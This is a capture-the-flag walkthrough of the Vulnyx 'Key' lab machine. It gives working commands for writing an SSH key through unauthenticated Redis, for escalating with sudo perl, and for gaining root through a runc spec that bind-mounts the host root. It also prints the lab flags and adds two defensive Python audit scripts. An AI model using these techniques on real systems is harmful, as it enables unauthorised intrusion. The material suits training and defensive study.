Vulnyx-Key-Walkthrough
城南花已开

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.225 08:00:27:8a:aa:be PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded
export ip=192.168.60.225
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.225:22
Open 192.168.60.225:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 10:52 CST
Initiating ARP Ping Scan at 10:52
Scanning 192.168.60.225 [1 port]
Completed ARP Ping Scan at 10:52, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:52
Completed Parallel DNS resolution of 1 host. at 10:52, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:52
Scanning 192.168.60.225 [2 ports]
Discovered open port 22/tcp on 192.168.60.225
Discovered open port 80/tcp on 192.168.60.225
Completed SYN Stealth Scan at 10:52, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.225
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-03-04 10:52:38 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:8A:AA:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.225
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10705]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Nothing useful there.

IPv6 entry point

You can take a slightly unusual route and scan the host over IPv6 instead.

Extra find: the IPv6 scan shows port 6379 open with a Redis service, which the IPv4 scan did not show.

❯ nmap -6 fe80::a00:27ff:fe8a:aabe%eth0 -A -sV -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 11:05 CST
Nmap scan report for fe80::a00:27ff:fe8a:aabe
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.54 ((Debian))
6379/tcp open redis Redis key-value store 6.0.16
MAC Address: 08:00:27:8A:AA:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.19
OS details: Linux 4.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info:
| IPv6 EUI-64:
| MAC address:
| address: 08:00:27:8a:aa:be
|_ manuf: PCS Systemtechnik/Oracle VirtualBox virtual NIC

TRACEROUTE
HOP RTT ADDRESS
1 1.51 ms fe80::a00:27ff:fe8a:aabe

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.30 seconds

Connect with the Redis command-line tool.

The CONFIG output reveals the user dick (the data directory is /home/dick).

❯ redis-cli -h fe80::a00:27ff:fe8a:aabe%eth0 -p 6379
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> CONFIG GET *
285) "dir"
286) "/home/dick"
287) "save"
[fe80::a00:27ff:fe8a:aabe%eth0]:6379>

Writing an SSH public key via Redis

We can try writing an SSH public key.

[fe80::a00:27ff:fe8a:aabe%eth0]:6379> CONFIG SET dir /home/dick/.ssh
OK
------------------------------------------------------
# in a new terminal
❯ (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt|redis-cli -h fe80::a00:27ff:fe8a:aabe%eth0 -p 6379 -x set ssh_key
OK
-------------------------------------------------------
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> CONFIG SET dbfilename "authorized_keys"
OK
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> save
OK
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> exit
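As an added defender-side check (not part of the original walkthrough): the CONFIG SET dir / CONFIG SET dbfilename / SAVE sequence above leaves its trace in the running configuration. This Python snippet audits a `CONFIG GET *` result for exactly that pattern, plus the settings that make the write possible in the first place (no requirepass, non-loopback bind, protected-mode off). The sample values are constructed to mirror what the session above produced.

```python
from typing import Dict, List

# `CONFIG GET *` returns a flat list alternating name, value. This constructed
# sample models the state after the walkthrough's CONFIG SET calls: the RDB
# dump directory now points into a user's .ssh folder and the dump file is
# named authorized_keys.
SAMPLE_CONFIG_FLAT: List[str] = [
    "dir", "/home/dick/.ssh",
    "dbfilename", "authorized_keys",
    "save", "3600 1 300 100 60 10000",
    "protected-mode", "no",
    "bind", "0.0.0.0 ::",
    "requirepass", "",
]

LOOPBACK = ("127.0.0.1", "::1", "-::1")  # redis.conf accepts the "-" prefix for optional binds

def pairs_to_dict(flat: List[str]) -> Dict[str, str]:
    """Turn the name/value list from CONFIG GET into a dict."""
    if len(flat) % 2:
        raise ValueError("CONFIG GET output must have an even number of entries")
    return dict(zip(flat[0::2], flat[1::2]))

def audit_redis_config(cfg: Dict[str, str]) -> List[str]:
    """Return findings for settings that enable or show the dump-to-authorized_keys abuse."""
    findings: List[str] = []
    d = cfg.get("dir", "")
    fn = cfg.get("dbfilename", "")
    if d.startswith("/home/") or d.startswith("/root") or "/.ssh" in d:
        findings.append(f"dir points into a home directory: {d}")
    if not fn.endswith(".rdb"):
        findings.append(f"dbfilename is not an .rdb file: {fn}")
    if fn == "authorized_keys" and d.endswith("/.ssh"):
        findings.append("dir/dbfilename combination writes an SSH authorized_keys file")
    if cfg.get("protected-mode", "yes") != "yes":
        findings.append("protected-mode is disabled")
    if cfg.get("requirepass", "") == "":
        findings.append("no requirepass set: unauthenticated CONFIG SET and SAVE are possible")
    non_loopback = [b for b in cfg.get("bind", "").split() if b not in LOOPBACK]
    if non_loopback:
        findings.append(f"bind listens on non-loopback address(es): {' '.join(non_loopback)}")
    return findings

if __name__ == "__main__":
    for line in audit_redis_config(pairs_to_dict(SAMPLE_CONFIG_FLAT)):
        print("[!]", line)
```

Against a live instance, feed the output of `redis-cli CONFIG GET *` (with `--no-raw` stripped to the bare values) into `pairs_to_dict`; a healthy server yields an empty findings list.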

User privilege escalation

Connect over SSH with the matching private key.

The user has sudo rights, so we escalate to gary.

❯ ssh dick@$ip -i ../.ssh/id_rsa
Linux key 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Sun May 21 19:09:56 2023 from 192.168.1.10
dick@key:~$ ls -al
total 40
drwx------ 4 dick dick 4096 may 21 2023 .
drwxr-xr-x 4 root root 4096 may 21 2023 ..
lrwxrwxrwx 1 root root 9 jul 19 2022 .bash_history -> /dev/null
-rwx------ 1 dick dick 220 jul 19 2022 .bash_logout
-rwx------ 1 dick dick 3526 jul 19 2022 .bashrc
drwx------ 3 dick dick 4096 jul 19 2022 .local
-rwx------ 1 dick dick 807 jul 19 2022 .profile
-rwx------ 1 dick dick 100 may 21 2023 .rediserve.sh
-rw-r--r-- 1 dick dick 66 jul 19 2022 .selected_editor
drwx------ 2 dick dick 4096 mar 4 06:01 .ssh
-r-------- 1 dick dick 33 may 21 2023 user.txt
dick@key:~$ cat user.txt
c58f5b2a916dc3287ec6901777ba7912
dick@key:~$ sudo -l
Matching Defaults entries for dick on key:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dick may run the following commands on key:
(gary) NOPASSWD: /usr/bin/perl
dick@key:~$ sudo -u gary /usr/bin/perl -e 'exec "/bin/bash";'
gary@key:/home/dick$

Root privilege escalation

gary also has sudo rights, in this case to run runc.

gary@key:/home/dick$ sudo -l
Matching Defaults entries for gary on key:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gary may run the following commands on key:
(root) NOPASSWD: /usr/bin/runc

runc is a container runtime used to run containers packaged according to the Open Container Initiative (OCI) specification.

RunC privilege escalation - HackTricks

Create a container whose spec bind-mounts the host's root directory onto the container's root directory.

gary@key:/tmp$ mkdir container
gary@key:/tmp$ cd container/
gary@key:/tmp/container$ runc spec
gary@key:/tmp/container$ ls -al
total 12
drwxr-xr-x 2 gary gary 4096 mar 4 06:17 .
drwxrwxrwt 11 root root 4096 mar 4 06:17 ..
-rw-r--r-- 1 gary gary 2592 mar 4 06:17 config.json
gary@key:/tmp/container$ vi config.json
## add the following entry to the "mounts" array
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},
gary@key:/tmp/container$ mkdir rootfs
gary@key:/tmp/container$ sudo /usr/bin/runc run container
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
c4fe6806da41e3087eff3c01b1a98d5f
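Added example, not from the walkthrough or from runc itself: the escape above works only because the edited spec bind-mounts the host `/` read-write and runs the process as uid 0. This Python audit parses an OCI config.json (the sample is a constructed, trimmed copy of the modified spec shown above) and flags bind mounts of sensitive host paths and a root process, which is what any sudo-wrapped runc invocation should check before running a user-supplied spec.

```python
import json
from typing import Any, Dict, List

# Constructed minimal OCI runtime spec shaped like the `runc spec` output above,
# with the extra bind mount that maps the host root into the container.
SAMPLE_CONFIG_JSON = """
{
  "ociVersion": "1.0.2",
  "process": {"terminal": true, "user": {"uid": 0, "gid": 0}, "args": ["sh"], "cwd": "/"},
  "root": {"path": "rootfs", "readonly": true},
  "mounts": [
    {"destination": "/proc", "type": "proc", "source": "proc"},
    {"type": "bind", "source": "/", "destination": "/", "options": ["rbind", "rw", "rprivate"]}
  ]
}
"""

# Host paths that must never be bind-mounted into a spec supplied by an unprivileged user.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/proc", "/sys", "/var/run/docker.sock")

def _is_under(path: str, prefix: str) -> bool:
    """True if path equals prefix or lies inside it; "/" only matches itself."""
    if prefix == "/":
        return path == "/"
    return path == prefix or path.startswith(prefix + "/")

def audit_oci_spec(spec: Dict[str, Any]) -> List[str]:
    """Return findings for mounts and process settings that give the container host access."""
    findings: List[str] = []
    for m in spec.get("mounts", []):
        if m.get("type") != "bind":
            continue  # proc, tmpfs, sysfs etc. are not host-path exposures
        src, dst = m.get("source", ""), m.get("destination", "")
        mode = "ro" if "ro" in m.get("options", []) else "rw"  # bind mounts default to rw
        for sensitive in SENSITIVE_HOST_PATHS:
            if _is_under(src, sensitive):
                findings.append(f"bind mount of host {src} at {dst} ({mode})")
                break
    # runc spec defaults the process user to uid 0 when it is not set.
    if spec.get("process", {}).get("user", {}).get("uid", 0) == 0:
        findings.append("process runs as uid 0 inside the container")
    return findings

def audit_oci_json(text: str) -> List[str]:
    """Convenience wrapper: parse a config.json string and audit it."""
    return audit_oci_spec(json.loads(text))

if __name__ == "__main__":
    for line in audit_oci_json(SAMPLE_CONFIG_JSON):
        print("[!]", line)
```

Run it against the config.json in the container directory before `runc run`; the sudoers rule on this box is only safe if runc refuses specs that produce any finding.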